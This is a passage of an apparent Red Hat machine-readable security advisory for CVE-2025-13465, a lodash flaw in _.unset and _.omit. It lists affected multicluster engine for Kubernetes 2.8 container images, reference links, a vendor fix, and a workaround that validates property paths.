"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
